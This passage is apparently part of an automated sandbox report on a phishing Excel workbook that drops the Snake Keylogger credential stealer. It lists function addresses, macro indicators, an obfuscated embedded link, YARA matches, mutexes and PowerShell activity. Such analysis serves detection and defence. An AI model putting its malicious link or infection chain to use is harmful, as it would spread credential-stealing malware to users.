                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00474E1829_2_00474E18
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047E22029_2_0047E220
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047CA3229_2_0047CA32
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00472E3029_2_00472E30
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00476E3029_2_00476E30
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047CA3829_2_0047CA38
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_004732C829_2_004732C8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_004772C829_2_004772C8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047E6DA29_2_0047E6DA
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_004772D829_2_004772D8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047E6E829_2_0047E6E8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047129129_2_00471291
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_004712A029_2_004712A0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_004752A029_2_004752A0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_004752B029_2_004752B0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_004732BA29_2_004732BA
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047574829_2_00475748
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047375029_2_00473750
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047776129_2_00477761
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047376029_2_00473760
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047777029_2_00477770
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047B70729_2_0047B707
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047CF0029_2_0047CF00
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047B71829_2_0047B718
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00479F2629_2_00479F26
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00479F3029_2_00479F30
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047873929_2_00478739
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047173829_2_00471738
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047573829_2_00475738
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00471BC129_2_00471BC1
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047D3C829_2_0047D3C8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00475BD129_2_00475BD1
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00471BD029_2_00471BD0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00475BE029_2_00475BE0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047BBE029_2_0047BBE0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00473BE929_2_00473BE9
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047A3E829_2_0047A3E8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00478BFF29_2_00478BFF
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00473BF829_2_00473BF8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047A3F829_2_0047A3F8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00477BF829_2_00477BF8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047EBA129_2_0047EBA1
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047EBB029_2_0047EBB0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0047D3B829_2_0047D3B8
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050004029_2_00500040
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050324029_2_00503240
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050644029_2_00506440
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050964029_2_00509640
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00501C6029_2_00501C60
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00504E6029_2_00504E60
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050806029_2_00508060
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00502C0029_2_00502C00
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00505E0029_2_00505E00
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050900029_2_00509000
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050000629_2_00500006
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050963029_2_00509630
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050162029_2_00501620
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_0050482029_2_00504820
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00507A2029_2_00507A20
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00500CC029_2_00500CC0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00503EC029_2_00503EC0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_005070C029_2_005070C0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_005028E029_2_005028E0
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_00505AE029_2_00505AE0
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxOLE indicator, VBA macros: true
                        Source: tmp8AF2.tmp.12.drOLE indicator, VBA macros: true
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxStream path 'MBD0002FDB7/\x1Ole' : https://exi.link/JkAPbL]QxW1i\wOtt[mq\Ob~wH#,f`\ynlvmd9Qp /^>RVxoNVTVE*G3k^(h($v)}Nf0?BCDiuqIdAfwge14cJJEnjMoNRpdoQTFRYtad4B14QJori7vb9tg0otcJEvB37mV5FRfxjOccunpjBMPEczg3lKLDJz7Jl7t3Cor37l3EGCGox!Qx8}OL,Af;#i`2
                        Source: 44330000.0.drStream path 'MBD0002FDB7/\x1Ole' : https://exi.link/JkAPbL]QxW1i\wOtt[mq\Ob~wH#,f`\ynlvmd9Qp /^>RVxoNVTVE*G3k^(h($v)}Nf0?BCDiuqIdAfwge14cJJEnjMoNRpdoQTFRYtad4B14QJori7vb9tg0otcJEvB37mV5FRfxjOccunpjBMPEczg3lKLDJz7Jl7t3Cor37l3EGCGox!Qx8}OL,Af;#i`2
                        Source: tmp8AF2.tmp.12.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                        Source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                        Source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                        Source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                        Source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: Process Memory Space: sihost.exe PID: 3408, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: sihost[1].exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: sihost.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: bKVNuVuE.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, B-.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 12.2.sihost.exe.43da760.5.raw.unpack, B-.csBase64 encoded string: 'Yxx9G1k1Vx3FA0TKFEkiYt3oF5YJ2ut2rc/PxqpuHv7alCYYPONcqB8Tvfg1/Q3g'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, v6YiYTTLP0FbJiwAyi.csSecurity API names: _0020.SetAccessControl
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, v6YiYTTLP0FbJiwAyi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, v6YiYTTLP0FbJiwAyi.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, a6V721GHmT2eX5khYe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@44/42@91/14
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxJump to behavior
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMutant created: \Sessions\1\BaseNamedObjects\EzdASNdtodBtRNekVibVvQtTLNZ
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeMutant created: NULL
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8249.tmpJump to behavior
                        Source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxOLE indicator, Workbook stream: true
                        Source: 44330000.0.drOLE indicator, Workbook stream: true
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P..............................}..w.............................1......(.P..............3........!............. N..............Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.... N......\.......................(.P.....................................................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..................................... N......}..w.............-Z........l......Y.....(.P.......................!.............................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.... N......\.......................(.P.....................................................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..................................... N......}..w.............-Z........l......Y.....(.P.......................!.............................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..-Z........l......Y.....(.P............................. .......................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..................................... N......}..w.............-Z........l......Y.....(.P.......................!.............................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@.......................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..................................... N......}..w.............-Z........l......Y.....(.P.......................!.............................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..................................... N......}..w.............-Z........l......Y.....(.P.......................!.....l.......................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ....... N......}..w.............-Z........l......Y.....(.P.....................................................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................ N..............0.'pu....W......}..w............@E......^...............(.P.....................8...............................Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................ N..................u....W......}..w............@E......^...............(.P.....................8...............................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................hb.........................s............................................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................tb.........................s..............".............................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................b.........................s............................X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................b.........................s..............".............................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................b.........................s............................X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................b.........................s..............".............................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................b.........................s..............".............X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................b.........................s..............".............X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........b.........................s.............."..... .......X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................b.........................s..............".............X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................b.........................s............................X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s..............".............................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......c.........................s..............".....$.......X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................)c.........................s..............".............X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................;c.........................s............................X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Gc.........................s..............".............................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............".....2.......X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................ec.........................s..............".............X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................wc.........................s....................l.......X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s..............".............................Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................c.........................s..............".............X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................c.........................s..............".............X...............Jump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P..............................`................................................................&.....
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................. ..........................s............................................
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P.......3..........................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P.......?..........................s............................................
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................P.......S..........................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P......._..........................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.P.......q..........................s.................... .......(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P.......~..........................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s............................................
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.......(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s............................................
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s....................l.......(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P..................................s............................................
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................P.......+..........................s............................(...............
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P.......8..........................s............................(...............
                        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ........... ...............Kr......................................................................
                        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P............. ...............Rr..............................................j.........&.............
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile read: C:\Windows\System32\drivers\etc\hosts
